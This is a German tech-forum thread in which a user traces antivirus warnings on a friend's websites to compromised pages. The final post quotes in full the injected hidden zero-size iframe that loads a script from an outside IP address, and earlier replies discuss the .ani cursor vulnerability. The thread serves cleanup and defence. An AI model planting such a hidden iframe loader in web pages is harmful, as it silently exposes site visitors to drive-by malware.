Virenmeldung bei Zugriff auf Website

Diskutiere Virenmeldung bei Zugriff auf Website im Webseitengestaltung, Programmierung, Suchmaschinenoptimierung Forum im Bereich Video, Bild, Grafik, Homepage; Hallo, ein Freund von mir hat 2 Websites (un96.com und basketball-portal.de). Seit einiger Zeit beschweren sich nun laufend User dass beim Aufruf der Website eine ...



 
  1. Virenmeldung bei Zugriff auf Website #1
    Senior Mitglied Standardavatar

    Standard Virenmeldung bei Zugriff auf Website

    Hallo,

    ein Freund von mir hat 2 Websites (un96.com und basketball-portal.de). Seit einiger Zeit beschweren sich nun laufend User dass beim Aufruf der Website eine Virenmeldung erscheinen würde. Als ich bei einer Bekannten auf die Seite zugriff erschien auch einmal eine Virenmeldung, Scanner war AntiVir. Ich selbst habe auch AntiVir auf dem Rechner aber nicht eine einzige Meldung. Ich habe auch schon die komplette Seite runtergeladen und scannen lassen ohne Ergebnis.

    Ich habe nach einem Screenshot wegen der Virenmeldung gefragt, er hat mir jedoch nur einen erhaltenen Screenshot von der Norton Firewall geschickt. Was ich noch weiss ist dass bei der Virenmeldung auch etwas von ANI mit beistand.

    Hat jemand von euch eine Idee was das sein könnte? Sobald ich einen Screenshot von der Virenmeldung bekomme poste ich den hier. Vielen Dank schonmal !!
    Angehängte Grafiken Angehängte Grafiken  

  2. Standard

    Hallo Ronmi,

    schau Dir mal Diesen Ratgeber. an. Dort wirst du bestimmt fündig.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. Virenmeldung bei Zugriff auf Website #2
    Tastatur Quäler Avatar von usch65

    Mein System
    usch65's Computer Details
    CPU:
    Intel C2D E8400 @ 3500MHz w/Xigmatek HDT-S1283
    Mainboard:
    Gigabyte GA-EP45-UD3R Rev.1 @ F10f
    Arbeitsspeicher:
    2 x A-DATA Vitesta Extreme Edition DIMM Kit 2048MB DDR2-800 @ 975MHz@2,1V
    Festplatte:
    Samsung HD252KJ 250GB + Samsung SP2504C 250GB
    Grafikkarte:
    Elitegroup N8800GT-512MX @ Arctic Cooling Accelero S1 inkl. Turbo Module
    Soundkarte:
    OnBoard Realtek HD-Audio Chip
    Monitor:
    Samsung SyncMaster1100p Plus 21"
    Gehäuse:
    Antec P180 Silber
    Netzteil:
    X-Spice Croon BF 850 Watt
    3D Mark 2005:
    24367
    Betriebssystem:
    WindowsXP Pro. SP3 & Win7 64bit
    Laufwerke:
    LG Electronics GSA-H66N DVD-Brenner
    Sonstiges:
    Hauppauge Nexus DVB-S

    Standard

    Hmm - also laut Symantec liegt der Angriff in einer Manipulation der Curser/Ani Files - wie das jedoch im Zusammenhang mit einer Web-Side läuft - KA!
    (Gab in letzter Zeit häufiger schon solche Meldungen bei Web-Sides)

  4. Virenmeldung bei Zugriff auf Website #3
    Hardware Vernichter Avatar von Jeck-G

    Mein System
    Jeck-G's Computer Details
    CPU:
    Athlon64 X2 5000+ Black, TR XP90C
    Mainboard:
    Gigabyte GA-MA790FX-DS5 (AMD 790FX)
    Arbeitsspeicher:
    4GB OCZ DDR2-1066 (OCZ2P10664GK) @3,25GB
    Festplatte:
    VelociRaptor 300GB, Hitachi T7K250 250GB + T7K500 500GB SATA
    Grafikkarte:
    Sapphire HD4870 512
    Soundkarte:
    X(treme)-Fi(delity) ESI Maya44
    Monitor:
    Viewsonic VX924
    Gehäuse:
    Chieftec LCX-01SL Mesh
    Netzteil:
    Enermax Liberty 500
    3D Mark 2005:
    ?
    Betriebssystem:
    Windows NT5.1 SP3
    Laufwerke:
    LG GSA-4167B, Toshiba SDM-1612
    Sonstiges:
    TechnoTrend S-1500 (DVB-S)

    Standard

    Es gab vor einiger Zeit beim IE (und natürlich anderen Internet-Programmen von M$) eine Sicherheitslücke, wo über manipulierte ani-Dateien Trojaner & Co. ins Systemeingeschleust werden konnten.

    Dein Freund sollte die Homepage nach .ani absuchen und eventuelle Verknüpfungen auf solche Dateien entfernen. Werden auf Homepages eh nicht verwendet, da ani für animierte Mauszeiger ist, animierte Bilder im Internet hat man über gif oder (insbesonders bei Werbebannern nervige) Flash.

    Zu langsam...

  5. Virenmeldung bei Zugriff auf Website #4
    Senior Mitglied
    Threadstarter
    Standardavatar

    Standard Problem gefunden !!

    Es war in diversen HTML und PHP Dateien ein iFrame eingebaut :

    <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

    Dieser leitet wohl auf eine Russische Seite, deshalb die Trojanermeldung.

    Wie das aber in die Dateien kam, keine Ahnung. Wer das gleiche Problem hat einfach nach so nem Code suchen, scheint kein Einzelfall zu sein.


Virenmeldung bei Zugriff auf Website

Besucher kamen mit folgenden Begriffen auf die Seite:

Stichworte


Guides, Tipps und Mitspieler zu Citadel: Forged with Fire findest du auf Citadel Forum - Forged with Fire.
-
Trete der Nintendo Community bei und besuche das Nintendo Switch Forum.